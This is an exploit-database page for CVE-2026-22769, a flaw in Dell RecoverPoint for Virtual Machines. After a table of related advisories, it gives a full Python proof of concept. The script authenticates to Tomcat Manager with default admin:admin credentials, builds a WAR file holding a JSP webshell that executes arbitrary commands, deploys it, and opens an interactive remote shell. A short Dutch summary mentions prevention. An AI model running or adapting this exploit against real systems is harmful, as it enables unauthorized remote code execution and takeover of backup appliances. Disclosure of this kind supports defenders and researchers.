Vulners
Lucene search
📄 Dell RecoverPoint for Virtual Machines Shell Upload
| Reporter | Title | Published | Views | Family All 17 |
|---|---|---|---|---|
 | CVE-2026-22769 | 17 Feb 202619:19 | – | attackerkb |
 | CVE-2026-22769 | 17 Feb 202619:44 | – | circl |
 | Dell RecoverPoint for Virtual Machines (RP4VMs) Use of Hard-coded Credentials Vulnerability | 18 Feb 202600:00 | – | cisa_kev |
 | CISA Adds Two Known Exploited Vulnerabilities to Catalog | 18 Feb 202612:00 | – | cisa |
 | Dell RecoverPoint for Virtual Machines 信任管理问题漏洞 | 17 Feb 202600:00 | – | cnnvd |
 | CVE-2026-22769 | 17 Feb 202619:19 | – | cve |
 | CVE-2026-22769 | 17 Feb 202619:19 | – | cvelist |
 | China-Linked Hackers Use Dell RecoverPoint Flaw to Drop GrimBolt Malware | 19 Feb 202614:52 | – | hackread |
 | Vulnerability fixed in Dell RecoverPoint for Virtual Machines | 18 Feb 202613:18 | – | ncsc |
 | CVE-2026-22769 | 17 Feb 202620:22 | – | nvd |
10
=============================================================================================================================================
| # Title : Dell RecoverPoint for Virtual Machines RCE |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.3 (64 bits) |
| # Vendor : https://www.dell.com/en-us/lp/dt/data-protection-suite-recoverpoint-for-virtual-machines |
=============================================================================================================================================
[+] Summary : PoC exploiteert standaard Tomcat Manager credentials (admin:admin) om een kwaadaardig WAR-bestand met een JSP-webshell te uploaden en uitvoeren op Dell RecoverPoint-appliances.
Dit kan leiden tot volledige remote code execution (RCE) en ongeautoriseerde toegang tot systeem- en applicatiegegevens.
Preventie omvat het verwijderen van standaardaccounts, beperken van Tomcat Manager-toegang, sterke wachtwoorden en monitoring van deployment logs.
[+] POC :
#!/usr/bin/env python3
import requests
import sys
import base64
import argparse
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
# Default credentials found in /home/kos/tomcat9/tomcat-users.xml
DEFAULT_USERNAME = "admin"
DEFAULT_PASSWORD = "admin" # or whatever the hardcoded default is - adjust based on actual discovery
JSP_WEBSHELL = '''
<%@ page import="java.util.*,java.io.*"%>
<%
if (request.getParameter("cmd") != null) {
Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));
OutputStream os = p.getOutputStream();
InputStream in = p.getInputStream();
DataInputStream dis = new DataInputStream(in);
String disr = dis.readLine();
while (disr != null) {
out.println(disr);
disr = dis.readLine();
}
}
%>
'''
def create_malicious_war(war_name="shell.war", shell_name="shell.jsp"):
"""
Creates a simple WAR file containing a JSP webshell
"""
import tempfile
import os
import zipfile
import uuid
temp_dir = tempfile.mkdtemp()
war_path = os.path.join(temp_dir, war_name)
web_inf = os.path.join(temp_dir, "WEB-INF")
os.makedirs(web_inf, exist_ok=True)
web_xml = os.path.join(web_inf, "web.xml")
with open(web_xml, 'w') as f:
f.write('''<?xml version="1.0" encoding="UTF-8"?>
<web-app xmlns="http://java.sun.com/xml/ns/javaee"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://java.sun.com/xml/ns/javaee
http://java.sun.com/xml/ns/javaee/web-app_3_0.xsd"
version="3.0">
<display-name>Malicious</display-name>
<welcome-file-list>
<welcome-file>shell.jsp</welcome-file>
</welcome-file-list>
</web-app>''')
jsp_path = os.path.join(temp_dir, shell_name)
with open(jsp_path, 'w') as f:
f.write(JSP_WEBSHELL)
with zipfile.ZipFile(war_path, 'w', zipfile.ZIP_DEFLATED) as war:
war.write(web_xml, arcname="WEB-INF/web.xml")
war.write(jsp_path, arcname=shell_name)
return war_path
def exploit(target_url, war_file, deploy_path="/shell"):
"""
Exploit the vulnerability by uploading and deploying malicious WAR
"""
print(f"[*] Targeting: {target_url}")
print(f"[*] Using default credentials: {DEFAULT_USERNAME}:{DEFAULT_PASSWORD}")
session = requests.Session()
session.auth = (DEFAULT_USERNAME, DEFAULT_PASSWORD)
session.verify = False
try:
status_url = f"{target_url}/manager/status"
r = session.get(status_url, timeout=10)
if r.status_code == 200:
print("[+] Authentication successful! Default credentials work.")
elif r.status_code == 401:
print("[-] Authentication failed. Default credentials rejected.")
return False
else:
print(f"[?] Unexpected response code: {r.status_code}")
except requests.exceptions.RequestException as e:
print(f"[-] Connection error: {e}")
return False
print(f"[*] Uploading malicious WAR to {deploy_path}")
deploy_url = f"{target_url}/manager/text/deploy"
with open(war_file, 'rb') as f:
war_content = f.read()
files = {
'file': (war_file, war_content, 'application/octet-stream')
}
params = {
'path': deploy_path,
'update': 'true'
}
try:
r = session.put(deploy_url, params=params, files=files, timeout=30)
if r.status_code == 200:
print(f"[+] WAR deployed successfully to {deploy_path}")
print(f"[+] Web shell available at: {target_url}{deploy_path}/shell.jsp")
print("[*] Example command: curl -k '{}{}/shell.jsp?cmd=id'".format(
target_url, deploy_path))
return True
else:
print(f"[-] Deployment failed. Response code: {r.status_code}")
print(f"[-] Response body: {r.text[:200]}")
return False
except requests.exceptions.RequestException as e:
print(f"[-] Error during deployment: {e}")
return False
def interactive_shell(target_url, shell_path):
"""
Simple interactive shell via the uploaded JSP webshell
"""
print("[*] Entering interactive shell (type 'exit' to quit)")
while True:
cmd = input("$> ")
if cmd.lower() == 'exit':
break
params = {'cmd': cmd}
try:
r = requests.get(f"{target_url}{shell_path}", params=params,
verify=False, timeout=10)
if r.status_code == 200:
print(r.text.strip())
else:
print(f"[-] Command failed: HTTP {r.status_code}")
except requests.exceptions.RequestException as e:
print(f"[-] Error: {e}")
def main():
parser = argparse.ArgumentParser(description='CVE-2026-22769 PoC Exploit By indoushka')
parser.add_argument('target', help='Target URL (e.g., https://192.168.1.100:8443)')
parser.add_argument('--deploy-path', default='/shell',
help='Deployment path for WAR (default: /shell)')
parser.add_argument('--interactive', '-i', action='store_true',
help='Launch interactive shell after exploitation')
args = parser.parse_args()
print("=== CVE-2026-22769 Dell RecoverPoint RCE PoC By indoushka ===")
print("Based on Mandiant/GTIG research\n")
print("[*] Creating malicious WAR payload...")
war_file = create_malicious_war()
print(f"[+] WAR created: {war_file}")
if exploit(args.target, war_file, args.deploy_path):
print("\n[+] Exploit successful!")
if args.interactive:
shell_url = f"{args.target}{args.deploy_path}/shell.jsp"
interactive_shell(args.target, f"{args.deploy_path}/shell.jsp")
else:
print("\n[-] Exploit failed.")
print("\n[*] Note: The created WAR file remains on the target")
print("[*] Location: /var/lib/tomcat9")
if __name__ == "__main__":
main()
Greetings to :======================================================================
jericho * Larry W. Cashdollar * r00t * Hussin-X * Malvuln (John Page aka hyp3rlinx)|
====================================================================================Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
20 Feb 2026 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 3.110
EPSS0.22894
SSVC